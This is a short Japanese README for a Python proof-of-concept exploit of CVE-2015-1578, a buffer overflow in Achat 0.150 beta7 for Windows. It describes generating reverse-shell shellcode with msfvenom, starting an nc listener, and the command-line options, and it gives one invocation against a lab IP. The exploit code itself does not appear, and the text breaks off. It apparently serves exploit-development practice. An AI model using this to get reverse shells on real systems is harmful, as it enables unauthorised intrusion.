
これは、Windows上のAchat 0.150 beta7におけるバッファオーバーフロー脆弱性CVE-2015-1578の概念実証エクスプロイトです。悪用により、巧妙に細工されたUDPパケットを介してリモートコード実行が可能になります。
これは CVE-2015-1578 の概念実証エクスプロイトです。この脆弱性は、Windows 上の Achat 0.150 beta7 におけるバッファオーバーフローであり、細工された UDP パケットを介してリモートコード実行を引き起こします。
この PoC は、クリーンでミニマルかつ構造化されたエクスプロイト開発の例として提供されます。以下の要素を示します:
msfvenom による動的シェルコード生成msfvenom (Metasploit Framework の一部)rlwrap (Netcat の操作性向上用)msfvenom を使って Unicode エンコードされたペイロードを動的に作成rlwrap nc を使ってリスナーを自動起動-i <target_ip> ターゲット IP アドレス (必須)
-l, --lhost <listener_ip> リバースシェル用のローカルホスト IP (必須)
-p, --lport <port> リバースシェル用のローカルポート (必須)
--rport <port> ターゲット上のリモート UDP ポート (デフォルト: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
これにより以下の処理が行われます: